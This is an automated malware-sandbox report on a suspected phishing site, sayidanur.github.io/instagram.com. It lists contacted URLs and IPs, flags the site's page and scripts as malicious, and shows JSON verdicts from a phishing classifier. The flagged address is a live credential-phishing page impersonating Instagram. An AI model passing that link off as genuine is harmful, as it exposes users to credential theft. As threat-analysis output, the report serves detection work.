                                                  https://www.facebook.com/ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923890061341413&__req=1&__rev=1016900551&__s=fcmjky%3Ao76ejb%3A95nhjd&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585655&__user=0&dpr=1&jazoest=21020&locale=ru_RU&lsd=AVrwfIkMup0false
                                                    unknown
                                                    https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU6C7UW3q327E2vwXw4BwUx60Vo1upE4W0OE2WxO0FE662y1Qw5Mx61vw4Ugao6C0lW0ny0RE2Jw8Xwn83fw6iw4vwbS1Lw7Jw7zwtU5K&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419924079772026106&__req=2&__rev=1016900551&__s=soewkf%3A5l6w24%3Ahbua9m&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585699&__user=0&dpr=1&jazoest=2982&lsd=AVrwfIkMi5Qfalse
                                                      unknown
                                                      https://play-lh.googleusercontent.com/rbz2GOYtKwW-yK99VC_CBSUL_k2PWkkL4NfYubMEmKBCPbGuNxZb_pP7N2WAKZsQUw=w416-h235-rwfalse
                                                        unknown
                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/BTuEBPL3Mnd.jsfalse
                                                          unknown
                                                          https://www.facebook.com/ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923890061341413&__req=4&__rev=1016900551&__s=fcmjky%3Ao76ejb%3A95nhjd&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585655&__user=0&dpr=1&jazoest=21020&locale=ru_RU&lsd=AVrwfIkMup0false
                                                            unknown
                                                            https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/GcgopRl4mBW.jsfalse
                                                              unknown
                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/jJPH6iCu1HH.jsfalse
                                                                unknown
                                                                https://static.xx.fbcdn.net/rsrc.php/v3ijJ_4/yf/l/en_GB/BBd2uei_xHo.jsfalse
                                                                  unknown
                                                                  https://static.xx.fbcdn.net/rsrc.php/v3i6ht4/yy/l/en_GB/Td5hkdtkXX5.jsfalse
                                                                    unknown
                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/udpNONeEc85.jsfalse
                                                                      unknown
                                                                      https://static.xx.fbcdn.net/rsrc.php/v3ioXj4/y9/l/ru_RU/UlpshyJeqkw.jsfalse
                                                                        unknown
                                                                        https://static.xx.fbcdn.net/rsrc.php/v3i_Ou4/yX/l/en_GB/UlpshyJeqkw.jsfalse
                                                                          unknown
                                                                          https://static.xx.fbcdn.net/rsrc.php/v3iKG04/yD/l/en_GB/-StUlb9du6-.jsfalse
                                                                            unknown
                                                                            https://static.xx.fbcdn.net/rsrc.php/v3/yJ/r/KO2irUskl3Y.jsfalse
                                                                              unknown
                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yM/r/7QNyOKeJP6X.jsfalse
                                                                                unknown
                                                                                https://static.xx.fbcdn.net/rsrc.php/v3/yx/l/0,cross/e3WW2lRt6d_.cssfalse
                                                                                  unknown
                                                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yX/l/0,cross/cac49QtG2Ld.cssfalse
                                                                                    unknown
                                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/Ja35YE72DAb.jsfalse
                                                                                      unknown
                                                                                      https://sayidanur.github.io/instagram.com/img/insta-fav.icotrue
                                                                                        unknown
                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/P-sBcB8ct1C.jsfalse
                                                                                          unknown
                                                                                          https://www.facebook.com/data/manifest/false
                                                                                            unknown
                                                                                            https://sayidanur.github.io/instagram.com/main.jstrue
                                                                                              unknown
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3iMyQ4/yx/l/en_GB/yUeQb7xXYnw.jsfalse
                                                                                                unknown
                                                                                                https://connect.facebook.net/signals/config/1362649510502605?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112%2C199%2C198%2C200%2C205%2C206%2C207%2C203%2C195%2C131%2C133%2C162%2C194%2C196%2C121%2C156%2C144%2C150%2C188%2C189%2C128%2C231%2C115%2C125%2C126%2C232%2C164%2C118%2C234%2C165%2C135%2C122%2C153%2C147%2C113%2C127false
                                                                                                  unknown
                                                                                                  https://static.xx.fbcdn.net/rsrc.php/v3iNig4/y7/l/en_GB/79SeOVWXEcm.jsfalse
                                                                                                    unknown
                                                                                                    https://play-lh.googleusercontent.com/GeIJA3m3_3mR1kSeB4G0rBs2Lb65AZcwW9HZmlSCFBxqD-BZyY0Q_MSCl_Mcy3-S2RY=s64-rwfalse
                                                                                                      unknown
                                                                                                      https://play-lh.googleusercontent.com/CgUPurtUp8SB709wsQcKLMv6JdIh1em0ka_58V69AorznLv42TV39etS2rt28wv9Rz8=w720-h405-rwfalse
                                                                                                        unknown
                                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/C5TXdJzIETO.jsfalse
                                                                                                          unknown
                                                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/y0/r/eFZD1KABzRA.pngfalse
                                                                                                            unknown
                                                                                                            https://static.xx.fbcdn.net/rsrc.php/v3ikJE4/yM/l/en_GB/H9hFVb-Q8_Q.jsfalse
                                                                                                              unknown
                                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3ixu44/yU/l/en_GB/Iud4PfRtk1i.jsfalse
                                                                                                                unknown
                                                                                                                https://static.xx.fbcdn.net/rsrc.php/v3imlR4/y0/l/en_GB/JAH0JDr9qF3.jsfalse
                                                                                                                  unknown
                                                                                                                  https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU6C7UW3q327E2vwXw4BwUx60Vo1upE4W0OE2WxO0FE662y1Qw5Mx61vw4Ugao6C0lW0ny0RE2Jw8Xwn83fw6iw4vwbS1Lw7Jw7zwtU5K&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419924079772026106&__req=1&__rev=1016900551&__s=soewkf%3A5l6w24%3Ahbua9m&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585699&__user=0&dpr=1&jazoest=2982&lsd=AVrwfIkMi5Qfalse
                                                                                                                    unknown
                                                                                                                    https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/BLqydITNHiz.jsfalse
                                                                                                                      unknown
                                                                                                                      https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/BGMvuu7HwCF.jsfalse
                                                                                                                        unknown
                                                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yK/r/lNInKxOqejp.jsfalse
                                                                                                                          unknown
                                                                                                                          https://play-lh.googleusercontent.com/xNx9CfCzg_VugRMv3rIxVd-GjLRx6_dIXGfTlrKqJwkZCPg_w-ZZNosQT46MYIoo_Q=w526-h296-rwfalse
                                                                                                                            unknown
                                                                                                                            https://play-lh.googleusercontent.com/_GRprxsBpsoPiM1vG1Qf6nHgqhBePssy13A3rff_JoYV4qn4dYP9Zs5yed_K_QYOdA=w526-h296-rwfalse
                                                                                                                              unknown
                                                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xgVgalBG80z.pngfalse
                                                                                                                                unknown
                                                                                                                                https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/ghLiHO2V3N4.pngfalse
                                                                                                                                  unknown
                                                                                                                                  https://play-lh.googleusercontent.com/63RAiBrl7WNn4cjdnuJq66QMzv7Br8RFftmeCwSV_z6z_s3Z8HdIoYERwCEf01m3aQ=w526-h296-rwfalse
                                                                                                                                    unknown
                                                                                                                                    https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.icofalse
                                                                                                                                      unknown
                                                                                                                                      https://static.xx.fbcdn.net/rsrc.php/v3/yy/l/0,cross/_PStGDb9Db2.cssfalse
                                                                                                                                        unknown
                                                                                                                                        https://sayidanur.github.io/instagram.com/styles.csstrue
                                                                                                                                          unknown
                                                                                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/wc_C9ZEewR3.jsfalse
                                                                                                                                            unknown
                                                                                                                                            https://play.google.com/store/search?q=instagram&c=apps&hl=ru&gl=USfalse
                                                                                                                                              unknown
                                                                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3iQbs4/yM/l/en_GB/5Tr2NIWNgxM.jsfalse
                                                                                                                                                unknown
                                                                                                                                                https://static.xx.fbcdn.net/rsrc.php/v3/yP/r/ZQxGeuP1tWI.pngfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://sayidanur.github.io/instagram.comtrue
                                                                                                                                                    unknown
                                                                                                                                                    https://static.xx.fbcdn.net/rsrc.php/v3iCwx4/yZ/l/en_GB/HZi4Ht9U6gq.jsfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/webfonts/fa-brands-400.woff2false
                                                                                                                                                        unknown
                                                                                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3iluz4/y2/l/en_GB/MvRHUS1G-cc.jsfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/0,cross/fo219H1KM4T.cssfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/v87V0xuYr4I.jsfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://play-lh.googleusercontent.com/VRMWkE5p3CkWhJs6nv-9ZsLAs1QOg5ob1_3qg-rckwYW7yp1fMrYZqnEFpk0IoVP4LM=s64-rwfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/RedpCkzOAc2.jsfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                  https://messenger.com/chromecache_321.2.dr, chromecache_373.2.drfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://support.google.comchromecache_642.2.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.youtube.comchromecache_279.2.drfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://fontawesome.comchromecache_459.2.drfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.internalfb.com/intern/invariant/chromecache_380.2.dr, chromecache_626.2.drfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.instagram.comchromecache_547.2.dr, chromecache_643.2.drfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://is1-ssl.mzstatic.com/image/thumb/Features3/v4/68/2d/b7/682db7fa-e9d5-ec7d-c694-fa2b0bd4d15d/chromecache_279.2.drfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://is1-ssl.mzstatic.com/image/thumb/PurpleVideo221/v4/ce/c0/92/cec092b1-23e1-b4b4-d21a-a86074e9chromecache_279.2.drfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://www.capcut.com/clause/terms-of-servicechromecache_279.2.drfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://is1-ssl.mzstatic.com/image/thumb/Features126/v4/ab/a2/60/aba26099-a4af-3549-e0f0-27d72ff767dchromecache_279.2.drfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://fburl.com/wiki/e0vmgfv2chromecache_434.2.drfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://git.io/fjulechromecache_551.2.drfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://is1-ssl.mzstatic.com/image/thumb/Purple221/v4/93/65/69/9365698a-8861-3219-065b-aea2043ac9a8/chromecache_279.2.drfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://instagram.com/chromecache_279.2.drfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://apis.google.com/js/api.jschromecache_544.2.dr, chromecache_535.2.drfalse
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://is1-ssl.mzstatic.com/image/thumb/PurpleSource221/v4/92/56/e5/9256e528-a2d2-4c99-844e-1e1c33achromecache_279.2.drfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://is1-ssl.mzstatic.com/image/thumb/Purple22/v4/da/ea/2e/daea2ed3-5a5b-16e5-15b2-26d579fa6532/mchromecache_279.2.drfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://schema.orgchromecache_279.2.drfalse
                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://is1-ssl.mzstatic.com/image/thumb/PurpleSource122/v4/62/ea/16/62ea1604-eb2e-1371-11a4-d5dabd1chromecache_279.2.drfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://is5-ssl.mzstatic.comchromecache_279.2.drfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://connect.facebook.net/chromecache_463.2.dr, chromecache_616.2.drfalse
                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://is1-ssl.mzstatic.com/image/thumb/Features111/v4/59/af/9e/59af9e68-220c-50d1-fb85-734b137d1e8chromecache_279.2.drfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://is1-ssl.mzstatic.com/image/thumb/PurpleSource122/v4/b7/76/d6/b776d664-06a6-c170-021c-b889976chromecache_279.2.drfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://www.photogrid.app/chromecache_279.2.drfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://payments.sandbox.google.com/payments/v4/js/integrator.js?rk=1chromecache_311.2.dr, chromecache_448.2.dr, chromecache_500.2.drfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://play.google.comchromecache_642.2.drfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://www.google.com/log?format=json&hasfast=truechromecache_535.2.drfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://is1-ssl.mzstatic.comchromecache_279.2.drfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://is1-ssl.mzstatic.com/image/thumb/Purple211/v4/84/16/80/841680b1-3872-7fa5-37c4-35741395390c/chromecache_279.2.drfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://www.capcut.com/clause/privacy-policychromecache_279.2.drfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://is1-ssl.mzstatic.com/image/thumb/PurpleSource122/v4/c3/02/0b/c3020b3d-eb76-6a5e-97a5-3df9c8cchromecache_279.2.drfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://fontawesome.com/license/freechromecache_459.2.drfalse
                                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://schema.orgchromecache_452.2.dr, chromecache_279.2.drfalse
                                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://is1-ssl.mzstatic.com/image/thumb/Purple221/v4/3a/91/07/3a9107db-4c42-a961-c373-e8b8b49e9682/chromecache_279.2.drfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://www.youtube.com/t/terms_paidservice.chromecache_279.2.drfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yX/l/0chromecache_373.2.drfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://twitter.com/AppStorechromecache_279.2.drfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.consumerfinance.gov/chromecache_414.2.dr, chromecache_525.2.drfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://is1-ssl.mzstatic.com/image/thumb/PurpleSource221/v4/ea/8a/59/ea8a59a7-8aeb-b59b-66d9-31258c4chromecache_279.2.drfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                157.240.0.6
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                32934FACEBOOKUSfalse
                                                                                                                                                                                                                                142.250.185.142
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                142.250.184.228
                                                                                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                142.250.184.206
                                                                                                                                                                                                                                play.google.comUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                185.199.110.153
                                                                                                                                                                                                                                sayidanur.github.ioNetherlands
                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                157.240.0.35
                                                                                                                                                                                                                                facebook.comUnited States
                                                                                                                                                                                                                                32934FACEBOOKUSfalse
                                                                                                                                                                                                                                185.199.109.153
                                                                                                                                                                                                                                unknownNetherlands
                                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                                216.58.206.86
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                142.250.185.214
                                                                                                                                                                                                                                play-lh.googleusercontent.comUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                157.240.251.9
                                                                                                                                                                                                                                scontent.xx.fbcdn.netUnited States
                                                                                                                                                                                                                                32934FACEBOOKUSfalse
                                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                                unknownReserved
                                                                                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                                                                                157.240.253.35
                                                                                                                                                                                                                                star-mini.c10r.facebook.comUnited States
                                                                                                                                                                                                                                32934FACEBOOKUSfalse
                                                                                                                                                                                                                                157.240.251.35
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                32934FACEBOOKUSfalse
                                                                                                                                                                                                                                104.17.25.14
                                                                                                                                                                                                                                cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                192.168.2.4
                                                                                                                                                                                                                                192.168.2.5
                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1521987
                                                                                                                                                                                                                                Start date and time:2024-09-29 06:53:05 +02:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 5m 41s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                Sample URL:https://sayidanur.github.io/instagram.com
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal64.phis.win@22/606@48/16
                                                                                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Browse: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                • Browse: https://apps.apple.com/uz/app/instagram/id389801252
                                                                                                                                                                                                                                • Browse: https://play.google.com/store/search?q=instagram&c=apps&hl=ru&gl=US
                                                                                                                                                                                                                                • Browse: https://www.facebook.com/pages/create/?ref_type=registration_form
                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 172.217.18.99, 142.250.186.46, 74.125.133.84, 34.104.35.123, 142.250.186.42, 216.58.212.138, 142.250.186.74, 142.250.181.234, 142.250.184.202, 142.250.184.234, 216.58.212.170, 216.58.206.42, 172.217.23.106, 216.58.206.74, 172.217.16.138, 142.250.186.138, 142.250.186.170, 142.250.186.106, 172.217.18.10, 172.217.16.202, 4.245.163.56, 199.232.210.172, 192.229.221.95, 13.95.31.18, 142.250.185.234, 142.250.185.74, 142.250.185.106, 172.217.18.106, 142.250.185.138, 142.250.185.170, 142.250.185.202, 2.19.224.19, 2.16.202.121, 95.101.54.216, 2.23.196.201, 23.201.254.30, 2.23.194.36, 20.3.187.198, 17.253.15.200, 17.253.15.199, 17.253.15.196, 17.253.15.204, 142.250.186.99, 142.250.186.67, 142.250.185.67, 142.250.185.195, 142.250.184.195, 216.58.206.67, 172.217.23.110
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): www.apple.com.edgekey.net.globalredir.akadns.net, xp.itunes-apple.com.akadns.net, js-cdn.music.apple.com, ssl.gstatic.com, slscr.update.microsoft.com, clientservices.googleapis.com, amp-api-edge.apps.apple.com, www.apple.com, e17437.dsct.akamaiedge.net, clients2.google.com, ocsp.digicert.com, xp.apple.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, itunes.apple.com.edgekey.net, sls.update.microsoft.com, update.googleapis.com, xp.apple.com.edgekey.net, js-cdn-music-lb.itunes-apple.com.akadns.net, www.gstatic.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, apps-cdn.itunes-apple.com.akadns.net, clients1.google.com, e8143.dscb.akamaiedge.net, apptrailers.itunes.g.aaplimg.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, e673.dsce9.akamaiedge.net, fonts.gstatic.com, ctldl.windowsupdate.com, authorize.music.apple.com.edgekey.net, e6858.dscx.akama
                                                                                                                                                                                                                                • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • VT rate limit hit for: https://sayidanur.github.io/instagram.com
                                                                                                                                                                                                                                No simulations
                                                                                                                                                                                                                                InputOutput
                                                                                                                                                                                                                                URL: https://www.facebook.com/?locale=ru_RU Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Facebook"],
                                                                                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                                                                                "prominent_button_name":"",
                                                                                                                                                                                                                                "text_input_field_labels":["Email address or phone number",
                                                                                                                                                                                                                                "Password",
                                                                                                                                                                                                                                "Create a new account"],
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://www.facebook.com/?locale=ru_RU Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "phishing_score":1,
                                                                                                                                                                                                                                "brands":"Facebook",
                                                                                                                                                                                                                                "legit_domain":"www.facebook.com",
                                                                                                                                                                                                                                "classification":"wellknown",
                                                                                                                                                                                                                                "reasons":["The URL matches the legitimate domain name for Facebook.",
                                                                                                                                                                                                                                "Facebook is a well-known brand.",
                                                                                                                                                                                                                                "The input fields are typical for a Facebook login page."],
                                                                                                                                                                                                                                "brand_matches":[true],
                                                                                                                                                                                                                                "url_match":true,
                                                                                                                                                                                                                                "brand_input":"Facebook",
                                                                                                                                                                                                                                "input_fields":"Email address or phone number,
                                                                                                                                                                                                                                 Password,
                                                                                                                                                                                                                                 Create a new account"}
                                                                                                                                                                                                                                URL: https://sayidanur.github.io/instagram.com/ Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Facebook",
                                                                                                                                                                                                                                "Instagram"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                                                                                "prominent_button_name":"",
                                                                                                                                                                                                                                "text_input_field_labels":[",
                                                                                                                                                                                                                                    . ",
                                                                                                                                                                                                                                ""],
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://www.facebook.com/?locale=ru_RU Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Facebook"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"Facebook",
                                                                                                                                                                                                                                "prominent_button_name":"",
                                                                                                                                                                                                                                "text_input_field_labels":["    ",
                                                                                                                                                                                                                                ""],
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://www.facebook.com/pages/create/?ref_type=registration_form Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "brand":["Facebook"],
                                                                                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                                                                                "trigger_text":"To get started,
                                                                                                                                                                                                                                 choose how you want to connect your business,
                                                                                                                                                                                                                                 yourself or your cause to the worldwide community of people on Facebook.",
                                                                                                                                                                                                                                "prominent_button_name":"Log in",
                                                                                                                                                                                                                                "text_input_field_labels":["Email or phone",
                                                                                                                                                                                                                                "Password"],
                                                                                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                                                                                URL: https://www.facebook.com/pages/create/?ref_type=registration_form Model: jbxai
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                "phishing_score":1,
                                                                                                                                                                                                                                "brands":"Facebook",
                                                                                                                                                                                                                                "legit_domain":"facebook.com",
                                                                                                                                                                                                                                "classification":"wellknown",
                                                                                                                                                                                                                                "reasons":["The brand 'Facebook' is well-known and globally recognized.",
                                                                                                                                                                                                                                "The URL 'www.facebook.com' matches the legitimate domain name for Facebook.",
                                                                                                                                                                                                                                "No suspicious elements such as misspellings,
                                                                                                                                                                                                                                 extra characters,
                                                                                                                                                                                                                                 or unusual domain extensions are present in the URL."],
                                                                                                                                                                                                                                "brand_matches":[true],
                                                                                                                                                                                                                                "url_match":true,
                                                                                                                                                                                                                                "brand_input":"Facebook",
